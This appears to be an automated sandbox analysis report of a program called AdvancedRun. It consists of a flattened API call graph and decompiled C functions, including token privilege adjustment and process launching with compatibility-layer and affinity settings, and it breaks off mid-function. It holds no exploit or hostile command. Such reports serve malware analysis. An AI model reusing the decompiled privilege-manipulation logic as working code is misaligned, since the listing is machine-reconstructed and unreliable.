5586->5587 5588 405e52 5587->5588 5589 405f39 3 API calls 5588->5589 5590 405e63 5589->5590 5591 405e7a EnumChildWindows 5590->5591 5592 405e6a SetWindowTextW 5590->5592 5591->5585 5592->5591 5594 405d76 5593->5594 5595 402bd0 ShowWindow UpdateWindow 5593->5595 5596 405d91 5594->5596 5597 405d89 EnumChildWindows 5594->5597 5598 405d97 EnumChildWindows 5596->5598 5599 405d9f 5596->5599 5597->5596 5598->5599 5601 404fbb GetWindowLongW SetWindowLongW 5599->5601 5601->5595 5602 409f9c 5603 40a03c memset memset memset _snwprintf _snwprintf 5602->5603 5604 409fbc memset memset _snwprintf _snwprintf 5602->5604 5605 40a037 5603->5605 5604->5605 5609 4038a3 5610 4038c3 5609->5610 5611 403a2a 5609->5611 5615 4038df 5610->5615 5616 402caf GetWindowPlacement 5610->5616 5612 403a41 5611->5612 5617 403ec3 2 API calls 5611->5617 5752 402d2e 5612->5752 5618 403ec3 2 API calls 5615->5618 5616->5615 5617->5612 5619 4038e6 5618->5619 5621 40467a 5 API calls 5619->5621 5623 403920 5619->5623 5620 403954 5655 40399e 5620->5655 5682 402923 memset 5620->5682 5622 4038f9 5621->5622 5624 403908 5622->5624 5625 4038fd 5622->5625 5623->5620 5629 40149f 12 API calls 5623->5629 5664 404415 5624->5664 5658 4045ba 5625->5658 5626 4039b8 5633 4039c6 5626->5633 5702 4037dd memset memset 5626->5702 5628 403965 5683 401000 5628->5683 5636 403937 5629->5636 5634 4039d5 5633->5634 5715 4035af 5633->5715 5641 4039e4 5634->5641 5722 40344d memset 5634->5722 5642 4013e1 9 API calls 5636->5642 5637 403904 5643 40467a 5 API calls 5637->5643 5647 403a07 5641->5647 5651 405b81 16 API calls 5641->5651 5648 403946 5642->5648 5644 403913 5643->5644 5649 403b16 17 API calls 5644->5649 5645 401000 wcsncat 5650 40398c 5645->5650 5647->5612 5738 4034f0 5647->5738 5681 4054b9 free free 5648->5681 5649->5623 5687 402b79 5650->5687 5654 4039f4 5651->5654 5733 40acfc SHGetMalloc 5654->5733 5655->5626 5690 4036d5 memset memset 5655->5690 5659 4045c7 5658->5659 5660 4043f8 RegOpenKeyExW 5659->5660 5661 4045d8 5660->5661 5662 4045e0 7 API calls 5661->5662 5663 404675 5661->5663 5662->5663 5663->5637 5665 404422 5664->5665 5666 4043f8 RegOpenKeyExW 5665->5666 5667 404433 5666->5667 5668 4045b3 5667->5668 5669 40443b memset _snwprintf 5667->5669 5668->5637 5756 409ecc RegCreateKeyExW 5669->5756 5671 40448b 5672 4045a8 RegCloseKey 5671->5672 5757 409ef4 wcslen RegSetValueExW 5671->5757 5672->5668 5674 4044aa RegCloseKey memset 5758 404ad9 GetModuleFileNameW 5674->5758 5676 4044e0 5676->5672 5677 4044f1 GetDriveTypeW 5676->5677 5677->5672 5678 404527 memset memset _snwprintf _snwprintf 5677->5678 5759 409f1a 5678->5759 5681->5620 5682->5628 5684 401037 5683->5684 5685 40103b 5684->5685 5686 40100e wcsncat 5684->5686 5685->5645 5686->5684 5688 405ce7 GetModuleHandleW 5687->5688 5689 402b91 DialogBoxParamW 5688->5689 5689->5655 5691 405b81 16 API calls 5690->5691 5692 403734 5691->5692 5693 405b81 16 API calls 5692->5693 5694 403744 5693->5694 5768 405236 memset 5694->5768 5697 405b81 16 API calls 5698 403766 GetSaveFileNameW 5697->5698 5699 4037d9 5698->5699 5700 4037b9 wcscpy 5698->5700 5699->5626 5771 40365e 5700->5771 5703 405b81 16 API calls 5702->5703 5704 40383d 5703->5704 5705 405b81 16 API calls 5704->5705 5706 40384d 5705->5706 5707 405236 6 API calls 5706->5707 5708 403866 5707->5708 5709 405b81 16 API calls 5708->5709 5710 40386f 5709->5710 5781 40507a GetOpenFileNameW 5710->5781 5712 40388c 5713 40389c 5712->5713 5714 40365e 32 API calls 5712->5714 5713->5633 5714->5713 5716 401d40 220 API calls 5715->5716 5717 4035dd 5716->5717 5718 4035eb 5717->5718 5784 4047d2 5717->5784 5720 4035fb FreeLibrary 5718->5720 5721 4035f7 5720->5721 5721->5634 5723 405b81 16 API calls 5722->5723 5724 403490 5723->5724 5725 405b81 16 API calls 5724->5725 5726 4034a0 5725->5726 5727 405236 6 API calls 5726->5727 5728 4034b9 5727->5728 5729 405b81 16 API calls 5728->5729 5730 4034c2 5729->5730 5731 40507a 2 API calls 5730->5731 5732 4034dc 5731->5732 5732->5641 5734 40ad16 SHBrowseForFolderW 5733->5734 5736 40ad6c 5733->5736 5735 40ad4a SHGetPathFromIDListW 5734->5735 5734->5736 5735->5736 5737 40ad5c wcscpy 5735->5737 5736->5647 5737->5736 5739 4034fd 5738->5739 5799 402923 memset 5739->5799 5741 40350b 5800 406670 5741->5800 5744 40a909 memset 5745 40354a 5744->5745 5810 402cd5 5745->5810 5748 403586 5813 4067ac 5748->5813 5749 403569 _ultow 5749->5748 5751 40359d 5751->5611 5753 402d62 5752->5753 5754 402d3b 5752->5754 5754->5753 5755 402d52 EndDialog 5754->5755 5755->5753 5756->5671 5757->5674 5758->5676 5766 409eb3 RegOpenKeyExW 5759->5766 5761 409f35 5762 4045a5 5761->5762 5767 409ef4 wcslen RegSetValueExW 5761->5767 5762->5672 5764 409f4c RegCloseKey 5764->5762 5766->5761 5767->5764 5769 40526f _snwprintf wcslen memcpy wcslen memcpy 5768->5769 5769->5769 5770 40375d 5769->5770 5770->5697 5772 403670 5771->5772 5773 40a0eb 2 API calls 5772->5773 5774 4036a1 5773->5774 5775 40177c 20 API calls 5774->5775 5776 4036b0 5775->5776 5777 403616 9 API calls 5776->5777 5779 4036b9 5777->5779 5778 4036cf 5778->5699 5779->5778 5780 403ec3 2 API calls 5779->5780 5780->5778 5782 4050dd 5781->5782 5783 4050cd wcscpy 5781->5783 5782->5712 5783->5712 5785 4047df 5784->5785 5786 4047e6 GetLastError 5785->5786 5787 4047ee 5785->5787 5786->5787 5790 404706 5787->5790 5791 404723 LoadLibraryExW 5790->5791 5792 40473a FormatMessageW 5790->5792 5791->5792 5795 404735 5791->5795 5793 404753 wcslen 5792->5793 5794 404778 wcscpy 5792->5794 5796 404760 wcscpy 5793->5796 5797 40476d LocalFree 5793->5797 5798 404787 _snwprintf MessageBoxW 5794->5798 5795->5792 5796->5797 5797->5798 5798->5718 5799->5741 5829 404fa4 memset 5800->5829 5802 40668b ??2@YAPAXI 5803 4066c9 ??2@YAPAXI 5802->5803 5805 4066ea ??2@YAPAXI 5803->5805 5807 40670b ??2@YAPAXI 5805->5807 5809 403521 memset 5807->5809 5809->5744 5811 402b79 2 API calls 5810->5811 5812 402ce3 5811->5812 5812->5748 5812->5749 5830 406746 5813->5830 5816 4067cd 5818 4067e0 5816->5818 5820 4055d1 free 5816->5820 5817 4055d1 free 5819 4067c6 ??3@YAXPAX 5817->5819 5821 4067f3 5818->5821 5823 4055d1 free 5818->5823 5819->5816 5822 4067d9 ??3@YAXPAX 5820->5822 5824 4055d1 free 5821->5824 5827 406806 5821->5827 5822->5818 5825 4067ec ??3@YAXPAX 5823->5825 5826 4067ff ??3@YAXPAX 5824->5826 5825->5821 5826->5827 5828 406837 free 5827->5828 5828->5751 5829->5802 5831 406751 ??3@YAXPAX 5830->5831 5832 406758 5830->5832 5831->5832 5833 406766 5832->5833 5834 40675f ??3@YAXPAX 5832->5834 5835 406770 ??3@YAXPAX 5833->5835 5836 406777 5833->5836 5834->5833 5835->5836 5837 406797 5836->5837 5838 406790 ??3@YAXPAX 5836->5838 5839 406787 ??3@YAXPAX 5836->5839 5837->5816 5837->5817 5838->5837 5839->5838 5840 407e24 memset memset 5841 407e6e 5840->5841 5842 407250 2 API calls 5841->5842 5843 407e7a _snwprintf 5842->5843 5844 407343 6 API calls 5843->5844 5845 407ea7 5844->5845 5846 40b225 __dllonexit 5847 40aba5 5848 40ac15 5847->5848 5849 40abb7 BeginDeferWindowPos 5847->5849 5852 40ac26 5848->5852 5858 402ec8 6 API calls 5848->5858 5850 402e22 3 API calls 5849->5850 5853 40abdc 5850->5853 5854 402e22 3 API calls 5853->5854 5855 40abeb 5854->5855 5856 402e22 3 API calls 5855->5856 5857 40abfb EndDeferWindowPos InvalidateRect 5856->5857 5857->5852 5858->5852 5859 40a726 5860 40a733 5859->5860 5862 40a750 5859->5862 5863 406d12 5860->5863 5864 406d27 5863->5864 5865 406d3b 5863->5865 5869 4033c7 SendMessageW 5864->5869 5867 4033c7 SendMessageW 5865->5867 5868 406d2c 5867->5868 5868->5862 5870 4033df 5869->5870 5870->5868 5871 402b26 5872 402b32 ExitProcess 5871->5872 5873 402b3a 5871->5873 5874 405d6a 4 API calls 5873->5874 5876 402b56 5873->5876 5874->5876 5875 402b5d SetWindowLongW 5877 402b6a 5875->5877 5876->5875 5876->5877 5878 40b6a6 5879 40b6b6 5878->5879 5880 40b6af ??3@YAXPAX 5878->5880 5881 40b6c6 5879->5881 5882 40b6bf ??3@YAXPAX 5879->5882 5880->5879 5883 40b6d6 5881->5883 5884 40b6cf ??3@YAXPAX 5881->5884 5882->5881 5885 40b6e6 5883->5885 5886 40b6df ??3@YAXPAX 5883->5886 5884->5883 5886->5885 5887 40b5a8 5888 40171f memset 5887->5888 5889 40b5b3 5888->5889 5890 40b23c 2 API calls 5889->5890 5891 40b5d6 5890->5891 5892 40a1a9 5895 409e82 5892->5895 5894 40a1d7 5896 409ea0 GetPrivateProfileIntW 5895->5896 5897 409e8e 5895->5897 5896->5894 5900 409d12 memset _itow WritePrivateProfileStringW 5897->5900 5899 409e9b 5899->5894 5900->5899 5901 402aaa 5902 402ab6 5901->5902 5903 405e0a 8 API calls 5902->5903 5907 402add 5902->5907 5904 402aca 5903->5904 5911 40588e 5904->5911 5906 402b6a 5907->5906 5908 405d6a 4 API calls 5907->5908 5910 402b56 5907->5910 5908->5910 5909 402b5d SetWindowLongW 5909->5906 5910->5906 5910->5909 5912 4058a9 ??2@YAPAXI memset memcpy 5911->5912 5914 405898 5911->5914 5913 4058ec ??3@YAXPAX 5912->5913 5915 4058f3 5912->5915 5913->5915 5914->5912 5914->5915 5915->5907 5916 40a92b 5917 40a980 _itow 5916->5917 5918 40a93e 5916->5918 5919 40a947 5917->5919 5918->5919 5920 40a961 wcschr 5918->5920 5921 40a944 5918->5921 5920->5919 5921->5919 5923 404ed0 5921->5923 5924 404ee1 5923->5924 5925 404ee9 FileTimeToSystemTime 5923->5925 5924->5925 5927 404f69 wcscpy 5924->5927 5926 404ef8 5925->5926 5925->5927 5926->5927 5928 404f00 GetDateFormatW GetTimeFormatW wcscpy wcscat wcscat 5926->5928 5929 404f78 5927->5929 5928->5929 5929->5919 5933 40a12c 5934 409e82 4 API calls 5933->5934 5935 40a14c 5934->5935 5936 405dac 5937 40b550 5936->5937 5938 405db9 memset GetDlgCtrlID 5937->5938 5939 405edd 5 API calls 5938->5939 5940 405ded 5939->5940 5941 405e03 5940->5941 5942 405df3 SetWindowTextW 5940->5942 5942->5941 5943 40a82d 5944 402ddd 6 API calls 5943->5944 5945 40a842 5944->5945 5946 402d78 10 API calls 5945->5946 5947 40a849 GetDlgItem 5946->5947 5958 4068ec 5947->5958 5951 40a8ce 5975 407f8d 5951->5975 5952 40a885 5952->5951 5972 403213 5952->5972 5955 40a8d5 5985 40ab39 5955->5985 5959 4068fd 5958->5959 5960 406746 5 API calls 5959->5960 5961 406907 ??2@YAPAXI ??2@YAPAXI 5960->5961 5962 40695c memcpy memcpy 5961->5962 5963 4069a1 5962->5963 5963->5962 5964 4069d9 ??2@YAPAXI ??2@YAPAXI 5963->5964 5967 405b81 16 API calls 5963->5967 5965 406a18 5964->5965 5966 406a23 5964->5966 5994 406607 5965->5994 5998 40686c 5966->5998 5967->5963 5970 406a69 5971 408157 SendMessageW SendMessageW 5970->5971 5971->5952 5973 403239 SendMessageW 5972->5973 5974 40322f wcslen 5972->5974 5973->5952 5974->5973 5976 408053 5975->5976 5977 407fb3 5975->5977 5978 408089 11 API calls 5976->5978 5979 40805b ImageList_Create ImageList_SetImageCount SendMessageW 5976->5979 5980 408024 ImageList_Create ImageList_SetImageCount 5977->5980 5981 407fbb memset memset GetWindowsDirectoryW SHGetFileInfoW 5977->5981 6015 40331d SendMessageW 5978->6015 5979->5978 5982 408044 SendMessageW 5980->5982 5981->5982 5982->5976 5984 408142 SendMessageW 5984->5955 5986 40a8f5 SetFocus 5985->5986 5987 40ab45 5985->5987 5987->5986 5988 406ccb SendMessageW 5987->5988 5989 40ab56 _wcsicmp 5987->5989 5988->5987 5989->5987 5990 40ab73 5989->5990 5991 40684f SendMessageW 5990->5991 5992 40ab80 SendMessageW 5991->5992 5993 40684f SendMessageW 5992->5993 5993->5986 5995 406611 ??2@YAPAXI 5994->5995 5996 40660e 5994->5996 5997 406637 5995->5997 5996->5995 5997->5966 5997->5997 5999 4055d1 free 5998->5999 6000 406875 5999->6000 6001 4055d1 free 6000->6001 6002 40687d 6001->6002 6003 4055d1 free 6002->6003 6004 406885 6003->6004 6005 4055d1 free 6004->6005 6006 40688d 6005->6006 6007 40559a 4 API calls 6006->6007 6008 4068a0 6007->6008 6009 40559a 4 API calls 6008->6009 6010 4068aa 6009->6010 6011 40559a 4 API calls 6010->6011 6012 4068b4 6011->6012 6013 40559a 4 API calls 6012->6013 6014 4068be 6013->6014 6014->5970 6015->5984 6016 4030ad 6017 4030d3 6016->6017 6018 4030b6 6016->6018 6019 40304d 3 API calls 6018->6019 6020 4030bf 6019->6020 6020->6017 6021 4030c3 _wtoi 6020->6021 6021->6017 6022 407ead 6023 407eb5 6022->6023 6024 407ebc 6022->6024 6025 405b81 16 API calls 6023->6025 6026 407eba 6025->6026 6027 406ab1 6029 406ac2 6027->6029 6028 406b07 6030 406b7b 6028->6030 6032 406b5d _wcsicmp 6028->6032 6029->6028 6031 406aff _wcsicmp 6029->6031 6031->6028 6032->6028 4510 40a33b FindResourceW 4511 40a354 SizeofResource 4510->4511 4514 40a37e 4510->4514 4512 40a365 LoadResource 4511->4512 4511->4514 4513 40a373 LockResource 4512->4513 4512->4514 4513->4514 4515 40b23c 4518 40b216 4515->4518 4517 40b245 4519 40b225 __dllonexit 4518->4519 4520 40b21f _onexit 4518->4520 4519->4517 4520->4519

                                                                  Executed Functions

                                                                  Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                  0x00408fc9
                                                                  0x00408fd0
                                                                  0x00408fe8
                                                                  0x00000000
                                                                  0x00408fea
                                                                  0x00408ff4
                                                                  0x00409001
                                                                  0x00409003
                                                                  0x0040900c
                                                                  0x0040900e
                                                                  0x00409010
                                                                  0x0040901a
                                                                  0x0040901a
                                                                  0x00409010
                                                                  0x0040901f
                                                                  0x00409026
                                                                  0x0040902d
                                                                  0x00409030
                                                                  0x00409035
                                                                  0x00409037
                                                                  0x00409040
                                                                  0x00409042
                                                                  0x00409044
                                                                  0x00409051
                                                                  0x00409051
                                                                  0x00409044
                                                                  0x00409053
                                                                  0x0040905e
                                                                  0x00000000

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                  • API String ID: 616250965-1253513912
                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4022d5-402395 call 40b550 memset * 3 call 404923 wcschr 5 4023a6-4023ac 0->5 6 402397-4023a0 ExpandEnvironmentStringsW 0->6 7 40241a-402423 5->7 8 4023ae-4023c0 wcschr 5->8 6->5 10 402425-402434 wcschr 7->10 11 40244b-402468 call 404b5c 7->11 8->7 9 4023c2-402403 memset SearchPathW 8->9 9->7 12 402405-402419 call 404923 9->12 13 402473-40247c 10->13 14 402436-402449 ExpandEnvironmentStringsW 10->14 11->13 17 40246a-402470 11->17 12->7 19 40247e-402488 13->19 20 40248f-40249a 13->20 14->17 17->13 19->20 22 4024a0-4024a7 20->22 23 402537-40253d 20->23 22->23 26 4024ad-402531 memset * 2 call 4052f3 * 2 _wtoi * 2 22->26 24 402543-40254a 23->24 25 4025da-4025e3 23->25 24->25 28 402550-4025d4 memset * 2 call 4052f3 * 2 _wtoi * 2 24->28 29 4025e5-4025eb 25->29 30 40265d-402666 25->30 26->23 28->25 35 402633 29->35 36 4025ed-4025f9 wcschr 29->36 32 402668 30->32 33 40266b-402675 30->33 32->33 39 402683-40268b 33->39 40 402677-40267e call 401d1e 33->40 37 402634-40265a _snwprintf 35->37 36->35 42 4025fb-402631 memset ExpandEnvironmentStringsW 36->42 37->30 45 4026a3-4026ac 39->45 46 40268d-402693 39->46 40->39 42->37 50 4026b5-4026b8 45->50 51 4026ae-4026b3 45->51 46->45 48 402695-40269e call 401d1e 46->48 48->45 54 4026c6-4026cc 50->54 55 4026ba 50->55 53 4026bf-4026c1 call 401d1e 51->53 53->54 56 4026d5-4026db 54->56 57 4026ce-4026d3 54->57 55->53 60 4026e4-4026ea 56->60 61 4026dd-4026e2 56->61 59 402700-402702 call 401d1e 57->59 65 402707-402710 59->65 62 4026f3-4026f9 60->62 63 4026ec-4026f1 60->63 61->59 62->65 66 4026fb 62->66 63->59 67 402712-402731 call 405497 call 4055ec call 40135c 65->67 68 40276d-402770 65->68 66->59 88 402733-402738 call 4014e9 67->88 89 40273d-402754 call 401421 67->89 70 402776-4027bf call 405497 * 2 call 40149f call 4055ec call 40135c call 401551 68->70 71 40280b-40280e 68->71 113 4027c1-4027c6 call 4014e9 70->113 114 4027cb-4027e2 call 401421 70->114 72 402810-402811 71->72 73 402813 71->73 76 402814-402819 SetEnvironmentVariableW 72->76 73->76 79 40281f-402841 call 401fe6 76->79 87 402846-40284a 79->87 91 40284c-40284f 87->91 92 40288e-40289c call 4055d1 87->92 88->89 103 402756 89->103 104 402759-402768 call 4054b9 89->104 91->92 97 402851-402857 91->97 97->92 101 402859-402888 call 401a3f GetProcessAffinityMask SetProcessAffinityMask 97->101 101->92 103->104 112 402803-402809 104->112 112->79 113->114 118 4027e4 114->118 119 4027e7-402801 call 4054b9 * 2 114->119 118->119 119->112
                                                                  C-Code - Quality: 83%
                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
